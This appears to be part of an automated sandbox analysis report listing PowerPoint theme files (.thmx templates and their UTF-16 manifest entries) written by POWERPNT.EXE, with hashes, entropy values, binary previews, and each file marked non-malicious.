                                                                                                                              Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):282
                                                                                                                              Entropy (8bit):3.51145753448333
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                                                                                                              MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                                                                                              SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                                                                                              SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                                                                                              SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):787354
                                                                                                                              Entropy (8bit):7.849038074328931
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:RBbqz121ANZ40EdYNyNv3GaNBlHT3pxozHUt3HnpHQPegZ+dNu+7TrlpocfYFWCH:qDNhEYNyJNBlT3pxoz0tAtZ00j
                                                                                                                              MD5:BBACB56BBFFA78CD4A21A9A6B331D84A
                                                                                                                              SHA1:5A854FB2FDFB3BD38DDE1AC7C832BA0FFD46F4F1
                                                                                                                              SHA-256:BD9DE870D21C8A5336ADC759EBFB740E105764810DD4B5B88BCA6213C9133CD7
                                                                                                                              SHA-512:59D798652E181582593B44015803A13F9838EE1C5971D2992F968D314CDB80B77A9869344D9D1FD26C2D8AFC4574DD9145E795DCFDA706E6CF1B49CAB6402C7B
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........x.%A}.4+.....k......[Content_Types].xml..n.@.E_.y.ac $..,........-..g@.u.G.+t.:......A1......=..._..d.....Y:.B...t.e.8]..].....s.M.=.....6...&Z.D.?.u..,."Q.].. W.....p0..Q.Z........Rm7....}\.{.W^.....Z3/N...o.....1'.T.o.HYw?....._,.<<c.qnn...8.:.B9.."^...U.O*q.....>..-]..O...-.q..Y.M...:.M+...}..y..{.0..V'K6.K?Qqz........c^..~GN.*s_..Q=g[k.....8..XCN..'....k.u.u....+..r...!.A....!.Q....a...7U.*uH...!gi=..Y.[.v{&.......q.=.[.v{....k.5.........4Y9..3Y).....v..mi...Wi.~.=G.....t.?.S......bB..H.%X.W..r.>.... .W.\...rU?.++i..&+g.b&+e\..h....r.V..^.JZ..j`........bB..H.%X.W..r.>.... .W.\...rU?.++i..&+g.b&+e\..h....r.V..^.JZ..j`........bB..H.%X.W..r.>.... .W.\...rU?.++i..&+g.b&+e\..h....r.V..^.JZ..j`...[..u...UN -.`A\a..U. .W.\...r5?..U..............q.....,D.%X5Zz.*i.....C.&2.k...UN -.`A\a..U. .W.\...r5?..U..............q.....,D.%X5Zz.*i.....C..d...*&T9..\..q...W.\...r.?.... .W.C...&+h.r&+f.R.%X..K..-.`.h....e.......zu9JR..7..Y=..6.?PK..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):274
                                                                                                                              Entropy (8bit):3.541057232141982
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXrpRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnybvymD0wbnKNAH/lMz1
                                                                                                                              MD5:92A2AE68F98D9D3037FB248C57EAE3AF
                                                                                                                              SHA1:7C4EA71979CF442503A45F3738BAF060FCD84999
                                                                                                                              SHA-256:A2EF06AAEEE6AFECA584F93CD70B018FE915C222D232EED569E990293BB72C41
                                                                                                                              SHA-512:F9B75F836E072A6F94B61F3673D4D435D5985345872BF428E5777EDD02AD6DB1BE78C9DC04EF4F178DAC9ED9DC41FB4A7352E34AD11264258E8DB21ED6517A90
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.i.s.p...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1649585
                                                                                                                              Entropy (8bit):7.875240099125746
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                              MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                              SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                              SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                              SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):284
                                                                                                                              Entropy (8bit):3.5552837910707304
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                                                                                                              MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                                                                                              SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                                                                                              SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                                                                                                              SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):966946
                                                                                                                              Entropy (8bit):7.8785200658952
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                              MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                              SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                              SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                              SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):282
                                                                                                                              Entropy (8bit):3.5323495192404475
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                                                                                                              MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                                                                                              SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                                                                                              SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                                                                                                              SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):857650
                                                                                                                              Entropy (8bit):7.84356939318248
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:RiQJnhBiU81d9WbQPHxV9uqraiDFihVRR5cJJeYiaFUV0CoTz:RiwhE8bIXkvQIjRR+nDmVK3
                                                                                                                              MD5:9A0B4CB63DD4E749EE4258F897FF42EE
                                                                                                                              SHA1:BD0F90AAD36C7DB69A57179B9702B13D8C83AABF
                                                                                                                              SHA-256:9C5471CD01C213E94E699E12331194370D8E3F4FC37776CAACDCF7CCB8949A2E
                                                                                                                              SHA-512:407AB455623FD3911E6B00CF0A23333979D7E29E7DFB0A759A3FF162B12894C843C51EFF6E1F99BB721851ABB122052ED7F141053FF4F5D955D7842B3600AA44
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK...........JE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK...........J.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):276
                                                                                                                              Entropy (8bit):3.5321161173982487
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXWwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyNymD0wbnKNAH/lMz1
                                                                                                                              MD5:7A218A379D40D2E5944DF3D26A11273C
                                                                                                                              SHA1:53780A0EC7DAF776E1A5C66FE40483E46CDA52FA
                                                                                                                              SHA-256:D1CEBEB92A3F7E0EA94AC966FF80ABC0BDE8B1087DAC1A197EF74C065F38565C
                                                                                                                              SHA-512:7A935202731A8E711C0FD9FDCDA720D0988DE608AD0B489D6AEC5F52D58EF76DEDD432414CF57F4B2E8FFEC9BB914B8B3BD80BB3CAE44DAB9A43ABB1944E64C3
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.t.l.a.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):976001
                                                                                                                              Entropy (8bit):7.791956689344336
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                              MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                              SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                              SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                              SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):278
                                                                                                                              Entropy (8bit):3.5270134268591966
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                                                                                                              MD5:327DA4A5C757C0F1449976BE82653129
                                                                                                                              SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                                                                                              SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                                                                                              SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1204049
                                                                                                                              Entropy (8bit):7.92476783994848
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                              MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                              SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                              SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                              SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):276
                                                                                                                              Entropy (8bit):3.5364757859412563
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                                                                                                              MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                                                                                              SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                                                                                                              SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                                                                                              SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1091485
                                                                                                                              Entropy (8bit):7.906659368807194
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                              MD5:2192871A20313BEC581B277E405C6322
                                                                                                                              SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                              SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                              SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):280
                                                                                                                              Entropy (8bit):3.5301133500353727
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                                                                                                              MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                                                                                              SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                                                                                              SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                                                                                              SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1623260
                                                                                                                              Entropy (8bit):7.867463315196704
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:bimPI+bGSIB3FKbFGTCpavIOuaR0Um9BbbjE68+xiMNcayWSvHo5R/m:OmPI+6fB3Abk8Q5tHmAsiMNccSvIr/m
                                                                                                                              MD5:126269588DEC71F54D53B563106D0500
                                                                                                                              SHA1:E4E27B005A9728617832F0F2645980CC2CE6EC52
                                                                                                                              SHA-256:0C11107C6CF799125DB9352E2F3A0D2B9ED5D55CBBEAED66D79464058598D94B
                                                                                                                              SHA-512:667F9CA3929926397ED5B43DF4859B8C52973F2603405763308D931C32C4DA831A144ED7041096AFC7CDD291B2978622DED5DD4C16C6BFB0F18235E05B212E5A
                                                                                                                              Malicious:false
